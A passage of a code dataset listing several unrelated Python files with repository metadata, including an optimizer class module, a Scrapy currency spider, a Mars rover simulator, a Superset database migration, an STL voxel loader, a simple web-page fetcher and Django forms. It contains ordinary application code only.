self.central_diff = kwargs.get(\"central_diff\",True)\n self.file_tag = kwargs.get(\"file_tag\",\"\")\n self.max_processes = kwargs.get(\"max_processes\",1)\n self.dx = kwargs.get(\"dx\",0.01)\n self.max_iterations = kwargs.get(\"max_iterations\",np.inf)\n self.num_avg = kwargs.get(\"num_avg\",1)\n\n self.use_finite_diff = kwargs.get(\"jac\") == None\n\n # BFGS args\n self.n_search = kwargs.get(\"n_search\",8)\n self.alpha_d = kwargs.get(\"default_alpha\",None)\n self.alpha_mult = kwargs.get(\"alpha_mult\",self.n_search-1)\n self.search_type = kwargs.get(\"line_search\",\"bracket\")\n self.rsq_tol = kwargs.get(\"rsq_tol\",0.8)\n self.wolfe_armijo = kwargs.get(\"wolfe_armijo\",1e-4)\n self.wolfe_curv = kwargs.get(\"wolfe_curv\",0.9)\n self.hess_init = kwargs.get(\"hess_init\",1.0)\n\n if self.wolfe_curv < self.wolfe_armijo:\n raise ValueError(\"Wolfe conditions improperly specified.\")\n\n # SQP args\n self.strict_penalty = kwargs.get(\"strict_penalty\",True)\n\n # GRG args\n self.cstr_tol = kwargs.get(\"cstr_tol\",1e-4)\n\n # Bounds and constraints\n bounds = kwargs.get(\"bounds\")\n constraints = kwargs.get(\"constraints\")\n\n # Assign method if not specified\n if self.method == None:\n if (bounds != None or constraints != None):\n self.method = \"sqp\"\n else:\n self.method = \"bfgs\"\n\n #Check for issues\n if self.method == \"bgfs\" and (bounds != None or constraints != None):\n raise ValueError(\"Bounds or constraints may not be specified for the simple BGFS algorithm.\")\n\nclass OptimizerResult:\n \"\"\"Return data from the 'minimize' function\"\"\"\n\n def __init__(self,f,x,success,message,iterations,obj_calls,cstr_calls=[]):\n self.f = f\n self.x = x\n self.success = success\n self.message = message\n self.total_iter = iterations\n self.obj_calls = obj_calls\n self.cstr_calls = cstr_calls\n\nclass Constraint:\n \"\"\"Class defining a constraint\"\"\"\n eval_calls = mp.Value('i',0)\n \n def __init__(self,cstr_type,f,pool,queue,settings,**kwargs):\n self.args = kwargs.get(\"args\",())\n self.type = cstr_type\n self.fun = f\n self.gr = kwargs.get(\"grad\")\n self.central_diff = settings.central_diff\n self.max_processes = settings.max_processes\n self.dx = settings.dx\n self.pool = pool\n self.queue = queue\n with self.eval_calls.get_lock():\n self.eval_calls.value = 0\n \n def g(self,x):\n with self.eval_calls.get_lock():\n self.eval_calls.value += 1\n return self.fun(x,*self.args)\n\n def del_g(self,x):\n if self.gr == None:\n return grad(self.g,x,self.dx,self.central_diff,self.pool)\n else:\n return self.gr(x)\n\n def __getstate__(self):\n self_dict = self.__dict__.copy()\n del self_dict['pool']\n return self_dict\n\n def __setstate__(self, state):\n self.__dict__.update(state)\n\nclass Objective:\n \"\"\"Class defining objective function\"\"\"\n eval_calls = mp.Value('i',0)\n\n def __init__(self,f,pool,queue,settings,**kwargs):\n self.args = settings.args\n self.fun = f\n self.gr = kwargs.get(\"grad\")\n self.hess = kwargs.get(\"hess\")\n self.central_diff = settings.central_diff\n self.max_processes = settings.max_processes\n self.dx = settings.dx\n self.num_avg = settings.num_avg\n self.pool = pool\n self.queue = queue\n with self.eval_calls.get_lock():\n self.eval_calls.value = 0\n\n def f(self,x):\n n = len(x)\n f_val = 0.0\n for i in range(self.num_avg):\n f_val += np.asscalar(self.fun(x,*self.args))\n with self.eval_calls.get_lock():\n self.eval_calls.value += 1\n msg = \"{0:>20}\".format(f_val)\n for value in x:\n msg += \", {0:>20}\".format(np.asscalar(value))\n self.queue.put(msg)\n return f_val/self.num_avg\n\n def del_f(self,x):\n if self.gr == None:\n return grad(self.f,x,self.dx,self.central_diff,self.pool)\n else:\n return self.gr(x)\n\n def __getstate__(self):\n self_dict = self.__dict__.copy()\n del self_dict['pool']\n return self_dict\n\n def __setstate__(self, state):\n self.__dict__.update(state)\n\n\nclass quadratic(object):\n \"\"\"Class for fitting, evaluating, and interrogating quadratic functions\n\n This class is used for fitting a quadratic function to a data set\n evaluating the function at specific points, and determining the\n characteristics of the function.\n \"\"\"\n def __init__(self, x, y):\n \"\"\"\n Construct a quadratic object from tabulated data.\n Quadratic is of the form f(x) = ax^2 + bx + c\n\n Inputs\n ------\n x = List of independent values\n y = List of dependent values\n \"\"\"\n super().__init__()\n\n # Calculate the quadratic coefficients\n x_sq = [xx**2 for xx in x]\n A = np.vstack([x_sq, x, np.ones(len(x))]).T\n self.a, self.b, self.c = np.linalg.lstsq(A,y,rcond=None)[0]\n \n # Calculate the coefficient of determination\n f = [self.f(xx) for xx in x]\n ssres = ((f - y)**2).sum()\n sstot = ((y - y.mean())**2).sum()\n\n if abs(sstot) < 1e-14:\n # Data points actually formed a horizontal line\n self.rsq = 0.0\n else:\n self.rsq = 1 - ssres / sstot\n\n\n def convex(self):\n \"\"\"\n Test to see if the quadratic is convex (opens up).\n \"\"\"\n # Convex has positive curvature (2nd derivative)\n # f\"(x) = 2a, so a > 0 corresponds to convex\n return (self.a > 0)\n\n\n def vertex(self):\n \"\"\"\n Find the coordinates of the vertex\n \"\"\"\n if self.a != 0.0:\n # Find x where f'(x) = 2ax + b = 0\n x = -0.5 * self.b / self.a\n return (x, self.f(x))\n else:\n # Quadratic is actually a line, no minimum!\n return (None, None)\n\n\n def f(self, x):\n \"\"\"\n Evaluate the quadratic function at x\n \"\"\"\n if x is not None: return self.a * x**2 + self.b * x + self.c\n else: return None\n", "repo_name": "SauravLChaudhari/OptiX-Master-PhoeniX-", "sub_path": "classes.py", "file_name": "classes.py", "file_ext": "py", "file_size_in_byte": 7647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "multiprocessing.Value", "line_number": 107, "usage_type": "call"}, {"api_name": "multiprocessing.Value", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.linalg.lstsq", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 209, "usage_type": "attribute"}]} +{"seq_id": "39949686612", "text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass AspenSpider(scrapy.Spider):\n name = 'aspen'\n allowed_domains = ['www.aspen.com.uy/sitio/']\n start_urls = ['http://www.aspen.com.uy/sitio/']\n\n def parse(self, response):\n for divisa in response.css(\".md-divisas table tr.bd\"):\n yield {\n \"Name\":divisa.css(\".moneda.fixphone strong::text\").extract_first(),\n \"Compra\":divisa.css(\"td:nth-child(2)::text\").extract_first(),\n \"Venta\":divisa.css(\"td:nth-child(3)::text\").extract_first()\n }", "repo_name": "ylvaldes/ScrapingCambio", "sub_path": "scrapycambios/spiders/aspen.py", "file_name": "aspen.py", "file_ext": "py", "file_size_in_byte": 561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "43761777075", "text": "import sys\nfrom io import TextIOWrapper\nfrom typings import RoverPosition, Coordinate, PositionList, RoverMission\nfrom exceptions import BoundsError, CollisionError, CommandError\n\n\ncommand_translation = {\n \"N\": {\n \"L\": \"W\",\n \"R\": \"E\",\n \"M\": Coordinate(0, 1)\n },\n \"E\": {\n \"L\": \"N\",\n \"R\": \"S\",\n \"M\": Coordinate(1, 0)\n },\n \"S\": {\n \"L\": \"E\",\n \"R\": \"W\",\n \"M\": Coordinate(0, -1)\n },\n \"W\": {\n \"L\": \"S\",\n \"R\": \"N\",\n \"M\": Coordinate(-1, 0)\n },\n}\n\n\ndef execute_mission(\n plateau_bounds: Coordinate,\n rover_missions: list[RoverMission]\n) -> list[RoverPosition]:\n\n rover_positions = PositionList(\n [mission.starting_position for mission in rover_missions])\n\n for i, (_, command_sequence) in enumerate(rover_missions):\n for command in command_sequence.upper():\n rover_positions[i] = process_command(\n command,\n rover_positions[i],\n )\n\n check_position_validity(\n rover_positions[i],\n plateau_bounds,\n rover_positions\n )\n\n return rover_positions\n\n\ndef process_command(\n command: str,\n rover_position: RoverPosition\n) -> RoverPosition:\n\n if command in 'LR':\n return turn_rover(rover_position, side=command)\n\n if command == \"M\":\n return move_rover_forward(rover_position)\n\n raise CommandError(command)\n\n\ndef turn_rover(rover: RoverPosition, side: str) -> RoverPosition:\n return RoverPosition(\n rover.x,\n rover.y,\n command_translation[rover.direction][side]\n )\n\n\ndef move_rover_forward(rover: RoverPosition) -> RoverPosition:\n movement = command_translation[rover.direction][\"M\"]\n\n return RoverPosition(\n rover.x + movement.x,\n rover.y + movement.y,\n rover.direction\n )\n\n\ndef check_position_validity(\n rover: RoverPosition,\n plateau_bounds: Coordinate,\n rover_positions: PositionList\n) -> None:\n\n position = rover.get_coordinate()\n\n if rover_positions.has_collision(position):\n raise CollisionError(position)\n\n if not ((0 <= position.x <= plateau_bounds.x) and (0 <= position.y <= plateau_bounds.y)):\n raise BoundsError(position, plateau_bounds)\n\n\ndef extract_mission_data_from_file(file_handle: TextIOWrapper) -> tuple[Coordinate, list[RoverMission]]:\n try:\n x, y = file_handle.readline().strip().split()\n bounds = Coordinate(int(x), int(y))\n\n missions = []\n for i, line in enumerate(file_handle.readlines()):\n if i % 2 == 0:\n x, y, direction = line.strip().split()\n starting_position = RoverPosition(int(x), int(y), direction)\n else:\n command_sequence = line.strip()\n missions.append(RoverMission(\n starting_position, command_sequence))\n\n except:\n exit_with_error_message(\n f\"Mission data could not be correctly extracted from file. Isn't it encrypted?\")\n\n if ((bounds.x <= 0) or (bounds.y <= 0)):\n exit_with_error_message(\n f\"Malformed mission plateau data ({bounds.x}, {bounds.y}). Please measure the mission plateau again.\")\n\n if i % 2 == 0 or not missions:\n exit_with_error_message(\n \"Mission data is missing some line. Is the file complete?\")\n\n for starting_position, command_sequence in missions:\n if not (0 <= starting_position.x <= bounds.x and 0 <= starting_position.y <= bounds.y):\n exit_with_error_message(\n f\"Rover set to start out of the plateau at position {starting_position}\")\n\n if any(command not in \"LRM\" for command in command_sequence):\n exit_with_error_message(\n f\"Invalid command found in sequence '{command_sequence}'. Was the transmission noisy?\")\n\n return(bounds, missions)\n\n\ndef exit_with_error_message(message: str) -> None:\n print(message)\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n if(len(sys.argv) > 0):\n filename = sys.argv[1]\n else:\n filename = input(\"Write mission data file name: \")\n\n try:\n with open(filename, 'rt', encoding='utf-8') as mission_file:\n plateau_bounds, rover_missions = extract_mission_data_from_file(\n mission_file)\n\n mission_results = execute_mission(plateau_bounds, rover_missions)\n\n print(\"Rover final position(s):\")\n for rover_position in mission_results:\n print(rover_position)\n\n except FileNotFoundError:\n print(\n f\"Mission data file '{filename}' could not be found. Isn't it top secret?\")\n\n except (BoundsError, CollisionError, CommandError) as error:\n print(error.message)\n", "repo_name": "rlawisch/mars_rover", "sub_path": "mars_rover.py", "file_name": "mars_rover.py", "file_ext": "py", "file_size_in_byte": 4782, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typings.Coordinate", "line_number": 11, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 16, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 21, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 26, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 32, "usage_type": "name"}, {"api_name": "typings.RoverMission", "line_number": 33, "usage_type": "name"}, {"api_name": "typings.PositionList", "line_number": 36, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 34, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 57, "usage_type": "name"}, {"api_name": "exceptions.CommandError", "line_number": 66, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 58, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 69, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 70, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 77, "usage_type": "name"}, {"api_name": "typings.RoverPosition", "line_number": 80, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 88, "usage_type": "name"}, {"api_name": "typings.Coordinate", "line_number": 89, "usage_type": "name"}, {"api_name": "typings.PositionList", "line_number": 90, "usage_type": "name"}, {"api_name": "exceptions.CollisionError", "line_number": 96, "usage_type": "call"}, {"api_name": "exceptions.BoundsError", "line_number": 99, "usage_type": "call"}, {"api_name": "io.TextIOWrapper", "line_number": 102, "usage_type": "name"}, {"api_name": "typings.Coordinate", "line_number": 105, "usage_type": "call"}, {"api_name": "typings.RoverPosition", "line_number": 111, "usage_type": "call"}, {"api_name": "typings.RoverMission", "line_number": 114, "usage_type": "call"}, {"api_name": "typings.Coordinate", "line_number": 102, "usage_type": "name"}, {"api_name": "typings.RoverMission", "line_number": 102, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 143, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 147, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "exceptions.BoundsError", "line_number": 167, "usage_type": "name"}, {"api_name": "exceptions.CollisionError", "line_number": 167, "usage_type": "name"}, {"api_name": "exceptions.CommandError", "line_number": 167, "usage_type": "name"}]} +{"seq_id": "25167154705", "text": "import sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nfrom superset import db\nfrom superset.utils.core import generic_find_fk_constraint_name\n\nrevision = \"3e1b21cd94a4\"\ndown_revision = \"6c7537a6004a\"\n\n\nsqlatable_user = sa.Table(\n \"sqlatable_user\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n sa.Column(\"table_id\", sa.Integer, sa.ForeignKey(\"tables.id\")),\n)\n\nSqlaTable = sa.Table(\n \"tables\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n)\n\ndruiddatasource_user = sa.Table(\n \"druiddatasource_user\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n sa.Column(\"datasource_id\", sa.Integer, sa.ForeignKey(\"datasources.id\")),\n)\n\nDruidDatasource = sa.Table(\n \"datasources\",\n sa.MetaData(),\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"user_id\", sa.Integer, sa.ForeignKey(\"ab_user.id\")),\n)\n\n\ndef upgrade():\n op.create_table(\n \"sqlatable_user\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"user_id\", sa.Integer(), nullable=True),\n sa.Column(\"table_id\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint([\"table_id\"], [\"tables.id\"]),\n sa.ForeignKeyConstraint([\"user_id\"], [\"ab_user.id\"]),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"druiddatasource_user\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"user_id\", sa.Integer(), nullable=True),\n sa.Column(\"datasource_id\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint([\"datasource_id\"], [\"datasources.id\"]),\n sa.ForeignKeyConstraint([\"user_id\"], [\"ab_user.id\"]),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n\n bind = op.get_bind()\n insp = sa.engine.reflection.Inspector.from_engine(bind)\n session = db.Session(bind=bind)\n\n tables = session.query(SqlaTable).all()\n for table in tables:\n if table.user_id is not None:\n session.execute(\n sqlatable_user.insert().values(user_id=table.user_id, table_id=table.id)\n )\n\n druiddatasources = session.query(DruidDatasource).all()\n for druiddatasource in druiddatasources:\n if druiddatasource.user_id is not None:\n session.execute(\n druiddatasource_user.insert().values(\n user_id=druiddatasource.user_id, datasource_id=druiddatasource.id\n )\n )\n\n session.close()\n with op.batch_alter_table(\"tables\") as batch_op:\n batch_op.drop_constraint(\"user_id\", type_=\"foreignkey\")\n batch_op.drop_column(\"user_id\")\n with op.batch_alter_table(\"datasources\") as batch_op:\n batch_op.drop_constraint(\n generic_find_fk_constraint_name(\"datasources\", {\"id\"}, \"ab_user\", insp),\n type_=\"foreignkey\",\n )\n batch_op.drop_column(\"user_id\")\n\n\ndef downgrade():\n op.drop_table(\"sqlatable_user\")\n op.drop_table(\"druiddatasource_user\")\n with op.batch_alter_table(\"tables\") as batch_op:\n batch_op.add_column(sa.Column(\"user_id\", sa.INTEGER(), nullable=True))\n batch_op.create_foreign_key(\"user_id\", \"ab_user\", [\"user_id\"], [\"id\"])\n with op.batch_alter_table(\"datasources\") as batch_op:\n batch_op.add_column(sa.Column(\"user_id\", sa.INTEGER(), nullable=True))\n batch_op.create_foreign_key(\n \"fk_datasources_user_id_ab_user\", \"ab_user\", [\"user_id\"], [\"id\"]\n )\n", "repo_name": "apache/superset", "sub_path": "superset/migrations/versions/2018-12-15_12-34_3e1b21cd94a4_change_owner_to_m2m_relation_on_.py", "file_name": "2018-12-15_12-34_3e1b21cd94a4_change_owner_to_m2m_relation_on_.py", "file_ext": "py", "file_size_in_byte": 3674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55269, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.Table", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 38, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 44, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 44, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 51, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 53, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 53, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 60, "usage_type": "call"}, {"api_name": "alembic.op.get_bind", "line_number": 63, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlalchemy.engine.reflection.Inspector.from_engine", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.engine", "line_number": 64, "usage_type": "attribute"}, {"api_name": "superset.db.Session", "line_number": 65, "usage_type": "call"}, {"api_name": "superset.db", "line_number": 65, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 84, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 84, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 87, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 87, "usage_type": "name"}, {"api_name": "superset.utils.core.generic_find_fk_constraint_name", "line_number": 89, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 96, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 96, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 97, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 97, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 98, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 98, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 99, "usage_type": "call"}, {"api_name": "sqlalchemy.INTEGER", "line_number": 99, "usage_type": "call"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 101, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.INTEGER", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "26753189460", "text": "import stltovoxel\nimport numpy as np\nimport os\nimport cv2\nimport shutil\nimport tkinter as tk\nfrom tkinter import filedialog\n\n\ndef loadvoxel(path,resolution=20): \n input=path\n folder_path = os.path.dirname(path)+r\"/mainaktestingfolder\"\n os.mkdir(folder_path)\n output=folder_path+\"/output.png\"\n \n binary_array = np.zeros((resolution,resolution,resolution), dtype=bool)\n\n stltovoxel.convert_file(input, output, resolution-3)\n \n image_names = os.listdir(folder_path)[0:resolution]\n\n for i, name in enumerate(image_names):\n image = cv2.imread(os.path.join(folder_path, name), cv2.IMREAD_GRAYSCALE)\n image=cv2.resize(image,(resolution,resolution))\n binary_array[i,:,:] = (image > 0)\n # assume that white pixels represent \"true\"\n print(binary_array)\n shutil.rmtree(folder_path)\n return binary_array\n \n\ndef openSTL(vsize):\n root = tk.Tk()\n root.withdraw()\n file_path = filedialog.askopenfilename()\n print(file_path) \n if(file_path==\"\"):\n return None\n return loadvoxel(file_path,vsize)\n \n \ndef popup():\n def open_popup():\n popup = tk.Toplevel()\n popup.title(\"Error\")\n popup.geometry(\"200x100\")\n popup_label = tk.Label(popup, text=\"Are you sure you want to exit?\")\n popup_label.pack(padx=20, pady=20)\n root = tk.Tk()\n root.geometry(\"300x200\")\n popup_button = tk.Button(root, text=\"Open Popup\", command=open_popup)\n popup_button.pack(padx=20, pady=20)\n root.mainloop()\n \n\n \nif __name__ == '__main__':\n popup()\n #openSTL()", "repo_name": "Mainak-Deb/3dCAD", "sub_path": "objects/computation/loadvoxel.py", "file_name": "loadvoxel.py", "file_ext": "py", "file_size_in_byte": 1570, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "stltovoxel.convert_file", "line_number": 18, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 28, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 35, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 35, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "71215411715", "text": "import html2text\nimport messages\nimport requests\n\nclass Feic:\n\n def __init__(self):\n\n self.messages = messages.messages\n\n def get_address_from_input(self):\n # the user input parsing goes here\n\n address = ''\n while (address == ''):\n\n print(self.messages['warning'])\n print('Enter \"quit\" to quit.')\n address = input('feicim URL > ')\n print(address)\n\n # parse any user commands\n if (address == 'quit' or address == 'exit' or address == '\"quit\"'):\n print(self.messages['oktnxbye'])\n exit()\n\n elif (address == 'show c'):\n print(self.messages['gpl3_conditions'])\n exit()\n\n elif (address == 'show w'):\n print(self.messages['gpl3_warranty'])\n exit()\n \n # add missing schema\n if (address[:8] != 'https://' and address[:7] != 'http://'):\n # default to https\n address = 'https://' + address\n\n return address\n\n\n def get_contents(self, address):\n # requests library \n # https://requests.readthedocs.io\n r = requests.get(address)\n\n return r.text\n\n\n def parse_content_to_md(self, content):\n # https://pypi.org/project/html2text/\n return html2text.html2text(content)\n\n\n def main(self):\n\n print(self.messages['greeting'])\n print(self.messages['description'])\n\n try:\n while True:\n\n print(self.parse_content_to_md(self.get_contents(self.get_address_from_input())))\n\n\n except KeyboardInterrupt:\n print(self.messages['oktnxbye'])\n\n\nif (__name__ == '__main__'):\n app = Feic()\n app.main()\n", "repo_name": "darrenkearney/feicit", "sub_path": "feic.py", "file_name": "feic.py", "file_ext": "py", "file_size_in_byte": 1770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "messages.messages", "line_number": 9, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "html2text.html2text", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "30964758368", "text": "from .models import Restoran, Bluda\nfrom django.forms import ModelForm, TextInput, NumberInput, CharField, ModelChoiceField, ImageField, IntegerField, \\\n FloatField, Textarea\n\n\nclass RestoranForm(ModelForm):\n class Meta:\n model = Restoran\n fields=['nazvan', 'adres', 'telefon','content','foto']\n widgets={\n 'nazvan': TextInput(attrs={'class':'form-control', 'placeholder': 'Название ресторана'}),\n 'adres': TextInput(attrs={'class': 'form-control', 'placeholder': 'Адрес ресторана'}),\n 'telefon': NumberInput (attrs={'class': 'form-control', 'placeholder': 'Телефон в формате 80...', 'step':11 }),\n }\n\nclass BludaForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['kategor'].empty_label = \"Категория не выбрана\"\n class Meta:\n model = Bluda\n fields=['title', 'kategor', 'foto','full_text','masa','cena','name_restoran']\n\n widgets = {\n 'title': TextInput(attrs={'class':'form-input', 'placeholder': 'Название ресторана'}),\n 'full_text': Textarea(attrs={'cols': 170, 'rows':50, 'placeholder': 'Список продуктов'}),\n }\n\n", "repo_name": 